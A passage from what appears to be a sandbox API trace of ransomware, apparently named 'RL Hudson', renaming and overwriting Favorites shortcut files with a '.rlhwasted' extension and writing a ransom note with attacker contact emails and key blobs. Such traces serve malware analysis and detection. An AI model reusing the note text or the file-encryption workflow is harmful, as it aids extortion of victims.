Entertainment.url") returned 65 [0198.919] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6d4580 [0198.919] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.919] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0198.919] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0198.920] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0198.920] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0198.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0198.921] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0198.922] SetEndOfFile (hFile=0x104) returned 1 [0198.923] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.923] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0198.923] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0198.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.rlhwasted")) returned 1 [0199.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.168] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.169] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0199.169] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.169] CloseHandle (hObject=0x10c) returned 1 [0199.171] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.171] CloseHandle (hObject=0x128) returned 1 [0199.171] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.171] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.172] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.172] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.172] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.173] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.173] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.184] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.184] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0199.184] _snwprintf (in: _Dest=0x6e7988, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hpHgUTgS4b0eBZLffYxH4PdkC6z2vG/RGLIcY4L8WT77sWaWJS+tNKjHTHJUXC39\r\nCBko+lmCXgsMK9SPyl3HpCkCnmHJVgK1VXWKBs+69ctNs18pd2K27CTQ6wpWDJKp\r\nbTRaRXkehTRpjYxN9zu9y/Moo43LXg/4SpZjVNCwpGM2YSyC2f00+Ixgg3+6suPb\r\n9K1dhpY05jPGdf8FXdgpsHSl2mvZ4AFcr57px7GqdQawXlvb16y8ba6h42sXAhr7\r\nG5wfdao/pyKOVzPovxIsLLX4Q42wEMSUkmXhJod/VB8RNPNXvSsy9odYK2R6cxMF\r\nDKGZ3TwSjL7X98HaoFDwYw9cHjUzOkDA5wTTqgUqeU4pFvHL7fNbSl0kdNVj5k1S\r\nFgPVs3DZIqrmlmJDZNkPYDyoefpk10w0z53ai11/WePpShn6Z+e6B5GRbS3B+y+T\r\nGmbonjKcqMyYwmZfZT8d36cY/D4Tz/cNSZBCker2MP9rdBeywFbqVVandr3pgN/7\r\nmWiSF3HttcTF0jaq7yUF1u4Y9rt//Zvt3n6+8K9auzUN+OXIs6A4xO1K2O9ZDQea\r\nM+y4s4+OOBI6h2GHatezbGCm+nsh+YzW/MbcAb/rP+1QpWJFZYUSD4ZHIhZANMvY\r\nyjS3nPJsRfeD8eJwU3kkkTheUCgqi2P3FhEHsFlniPB=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.184] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.184] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.184] SetEndOfFile (hFile=0x104) returned 1 [0199.187] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0199.187] CloseHandle (hObject=0x104) returned 1 [0199.192] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.192] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f24d0 | out: hHeap=0x6b0000) returned 1 [0199.193] _aulldvrm () returned 0x0 [0199.193] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0199.193] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.193] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.193] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0199.194] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x270) returned 0x6d4580 [0199.194] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.194] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e7988 [0199.194] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0199.194] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6e7988 | out: pbBuffer=0x6e7988) returned 1 [0199.194] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0199.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.195] WriteFile (in: hFile=0x104, lpBuffer=0x6e7988*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e7988*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.196] SetEndOfFile (hFile=0x104) returned 1 [0199.196] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.196] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0199.196] lstrcpyW (in: lpString1=0x6d45e6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.rlhwasted")) returned 1 [0199.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.270] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.270] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0199.270] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.270] CloseHandle (hObject=0x10c) returned 1 [0199.300] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.300] CloseHandle (hObject=0x128) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.300] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.301] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.301] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.301] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.302] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.302] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.312] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.312] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.312] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mre1A6yf4Mnaix7tXPU46b+JFp/8CBkxnPJgiUBcDjOc26wApk0Ubnx7AymODG9p\r\nuwRpl+j0DEGXaN3Q5A0ril0S3jBDO5SlkQqAwPnxsdiwBhbbpJBVxLYh483fGnQR\r\nFR6njkmQpaB0QAodF4J5pNJGE8VjJwYgl1L9fJtpC6XcH6xCE8oOXdDZtdofpa5S\r\nmrDaRdhy1HtS3he/7pAJqWlYd7ntVgXVVghoEBspco4WyZ7lTZAVXaAeV9AevQia\r\n7I65gYC4TQvS8Rcduo+fX35KVwixmI5+hhUoJ2y7hLcmwaTEtf/Lg4lASkfaCX5v\r\n4tZSHQkwH7poXzaadRi/LCIU3d8aa3MZNpkIbErp2epkHcPDRgWZmA/kTS2WSroE\r\nwkwOjUQrGQ0gUUclEpuezfTz8j8Z0++IPZy6X8QitKFXM0p4WNEp0BW9yeRGMhLM\r\nOwoGo/H95mpg68KHMh9LfVSw9VdaDn2oXie7qiOrFuDcrMHX+se9zuD2Gt6FfQdk\r\ng7Zr8r79smU6PEa0jHBT2OntTD7LE275Eq84zggDH4P5SdsjRDld0MLYLVryJnvr\r\n3JqFrlWH5nB+ac3h8yNf7gmqR29vblOyWsdGjylnYi10ZPbr8vrF4OpvfsUmHiIh\r\nLItkuE6lMjhNrofmtO1sz0NKQv/me0aG6UmWE8+/qYS=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.312] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.312] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.312] SetEndOfFile (hFile=0x104) returned 1 [0199.315] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.315] CloseHandle (hObject=0x104) returned 1 [0199.317] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.317] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.317] _aulldvrm () returned 0x0 [0199.317] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0199.318] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.318] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.318] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0199.318] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6d4580 [0199.318] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.318] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.318] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0199.319] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.319] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.323] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.324] SetEndOfFile (hFile=0x104) returned 1 [0199.325] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.325] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.325] lstrcpyW (in: lpString1=0x6d4602, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.rlhwasted")) returned 1 [0199.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.326] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.326] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0199.326] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.326] CloseHandle (hObject=0x128) returned 1 [0199.329] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.329] CloseHandle (hObject=0x10c) returned 1 [0199.329] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.329] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.330] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.330] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.330] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.331] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.331] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.343] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.344] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.344] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.344] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jiryIuweet3skx1QmLnPcjigD9mjtmP7qDr+ms7ubKL4RmAMhgWbtM6bk89viV2g\r\nERxq0RUuuPWPcIfgzWD7AkQmv9xGFFwoCpBnAHIzNUmb7WBfMNmjQ9N1aN7w/CqN\r\nL30JJn4kgZIduHSPE5a62OHTwBPOq2DzIjYTj8Lh1F49Uq6mv5vgPFc+cy3BO+TV\r\nP2i3nas2aOI1HAe8ZUHIGH7BZnjSzo0gnQ++rI7pZMEDMXER9B2zQ4A5AwxmBCTM\r\n2msExuraRuy3ZpmWbi3EnIMN+jN22MC4CXUjnepw2cYYQMmsCOLnDTQapASZ6g6w\r\nYO8IPWMs4g3qqll2fQ720q35um6FIBZ+fSuRGjxQTFFfRqJ5IBs2zegJeh7cOFL0\r\nkoE4y5x15Gw1DUThQ7TacSF0UKJGqL8CmAk1KZ1jGdmJiFpoFqEeR30SxVgYAMqp\r\nQq9vqV6d8omUdahAl43eoMo/CGmnknv93GG8YOuB7ahESd22FIB5ELnh7Yb8oSiL\r\nxzxyX+LCs1dtLSaOAj+Rn2SUgTmSukkWbUDoTShRwDx0CZAoTEeJcxhhY9y4lwMU\r\n9iPwxeRG5n5KTWwqDpx8oLWuu1eXv+OBBuzWZZv8OW/AyMNcDAYypA4eFcnPmM/9\r\nQ9KjP8JsYvMmk8kXo0g+oxp6dT2MqYiVkPzZTeg9m/E=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.344] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.344] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.344] SetEndOfFile (hFile=0x104) returned 1 [0199.445] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.445] CloseHandle (hObject=0x104) returned 1 [0199.445] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.446] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2690 | out: hHeap=0x6b0000) returned 1 [0199.446] _aulldvrm () returned 0x0 [0199.446] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0199.447] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.447] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.447] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0199.447] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x290) returned 0x6d4580 [0199.447] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.447] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.447] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0199.448] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.448] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.449] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.451] SetEndOfFile (hFile=0x104) returned 1 [0199.451] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.451] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.451] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.rlhwasted")) returned 1 [0199.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.rlhwasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.452] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.452] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: 